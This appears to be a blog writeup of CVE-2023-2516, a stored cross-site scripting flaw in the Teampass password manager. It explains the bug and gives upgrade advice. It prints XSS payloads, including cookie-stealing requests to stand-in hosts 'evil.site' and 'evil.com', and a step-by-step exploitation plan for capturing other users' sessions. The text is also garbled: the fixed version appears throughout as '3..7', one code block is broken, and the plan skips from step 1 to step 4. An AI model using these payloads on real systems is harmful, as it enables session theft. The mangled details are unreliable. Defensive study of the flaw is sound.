CVE-2023-2516 - Stored Cross-site Scripting (XSS) in Teampass Before 3..7 – Exploit Breakdown and Details

Recently, a critical vulnerability was reported in the Teampass password management system, tracked as CVE-2023-2516. This Stored Cross-site Scripting (XSS) issue affects versions prior to 3..7 and has the potential to compromise the security of organizations relying on Teampass.

What Is Stored XSS?

Cross-site Scripting (XSS) is a common web application security issue where an attacker injects malicious scripts into web pages viewed by other users. Stored XSS means the malicious payload gets permanently stored on the server (like in a database), then shown to other users when they load that data.

About Teampass

Teampass is an open-source password manager for teams. It helps groups manage and share passwords securely.

Where’s the Vulnerability?

The bug is in the way Teampass handles certain input fields—like item labels and metadata—without properly sanitizing user-provided data. Attackers can inject JavaScript by entering specially crafted input, which gets stored in the database.

Whenever another user loads the vulnerable page (like viewing a password entry), the script executes in their browser.

Affected Versions:

- nilsteampassnet/teampass before version 3..7  
GitHub Release Notes

Malicious User Adds a New Item:

The attacker creates a new item in Teampass, putting malicious JavaScript in a field (such as the label or notes).

Malicious Code Executes:

The attacker’s script runs in the victim’s browser, stealing their session or performing actions as them.

Suppose you can add or edit an item’s label. An attacker uses

<script>alert('XSS by attacker!')</script>

When another user browses the item, this is what the underlying HTML might look like

<tr>
  <td><script>alert('XSS by attacker!')</script></td>
  <td>Password123!</td>
</tr>

As soon as the page loads, the script is executed by the browser—classic stored XSS.

An attacker with user access could submit something like

<img src="x" onerror="fetch('https://evil.site/steal?cookie='+document.cookie)">

Now, when another user views the item

- The onerror fires, and the victim’s cookie (possibly including their session) is sent to the attacker’s server.

Here’s a real-world exploitation plan

1. Create a new item > Enter payload in the label/note field:

`html

fetch('<a href="https://evil.com?c='+document.cookie" rel="nofollow">https://evil.com?c='+document.cookie</a>)

Wait for an admin or user to view the item.

4. Capture their data/session on your server.

Fixed in Teampass 3..7

- Release/Changelog

Upgrade Now!

If you’re running Teampass older than 3..7, update immediately.

Developer Tip

Always sanitize user input on entry and escape output before rendering content to users.

// Simple PHP example
echo htmlspecialchars($userInput, ENT_QUOTES, "UTF-8");

References and Further Reading

- NIST – CVE-2023-2516
- GitHub Issue/Discussion
- OWASP XSS Guide

Summary

CVE-2023-2516 is a real-world example showing why input validation is so important. Exploiting it is simple; all an attacker needs is a regular Teampass user account.

Recommendation:  
If you use Teampass, upgrade to v3..7 or later. Also, educate your team about XSS, and regularly review your app for these kinds of bugs.

Timeline

Published on: 05/05/2023 19:15:00 UTC
Last modified on: 05/10/2023 02:20:00 UTC